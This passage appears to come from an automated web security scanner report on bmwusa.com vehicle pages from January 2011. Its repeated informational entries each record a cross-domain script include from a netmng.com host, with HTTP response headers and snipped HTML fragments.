The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:11 GMT;path=/
Content-Length: 225966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.100. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:19 GMT;path=/
Content-Length: 215092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.101. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:36 GMT;path=/
Content-Length: 202376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.102. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:26:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:46:20 GMT;path=/
Content-Length: 215070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.103. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:37 GMT;path=/
Content-Length: 225949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.104. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:27:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:47:15 GMT;path=/
Content-Length: 216307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.105. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:59 GMT;path=/
Content-Length: 202183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.106. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:38 GMT;path=/
Content-Length: 215063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.107. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:12 GMT;path=/
Content-Length: 226227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.108. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:45 GMT;path=/
Content-Length: 216433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.109. http://www.bmwusa.com/standard/content/vehicles/2011/3/3convertibleexplorenew.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/3convertibleexplorenew.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:54 GMT;path=/
Content-Length: 180296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.110. http://www.bmwusa.com/standard/content/vehicles/2011/3/3coupeexplorenew.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/3coupeexplorenew.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:21 GMT;path=/
Content-Length: 180154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.111. http://www.bmwusa.com/standard/content/vehicles/2011/3/3sedanexplore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/3sedanexplore.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:41 GMT;path=/
Content-Length: 179241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.112. http://www.bmwusa.com/standard/content/vehicles/2011/3/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:40 GMT;path=/
Content-Length: 210063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.113. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:42:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:02:35 GMT;path=/
Content-Length: 201964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.114. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:40:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:00:40 GMT;path=/
Content-Length: 202153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.115. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:51 GMT;path=/
Content-Length: 213820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.116. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:39:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:59:15 GMT;path=/
Content-Length: 213821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.117. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:31 GMT;path=/
Content-Length: 227489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.118. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:07 GMT;path=/
Content-Length: 227490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.119. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:59:54 GMT;path=/
Content-Length: 214968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.120. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:39 GMT;path=/
Content-Length: 202084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.121. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:01 GMT;path=/
Content-Length: 214817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.122. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:01 GMT;path=/
Content-Length: 227586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.123. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:54:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:14:39 GMT;path=/
Content-Length: 227587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.124. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:30 GMT;path=/
Content-Length: 213527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.125. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
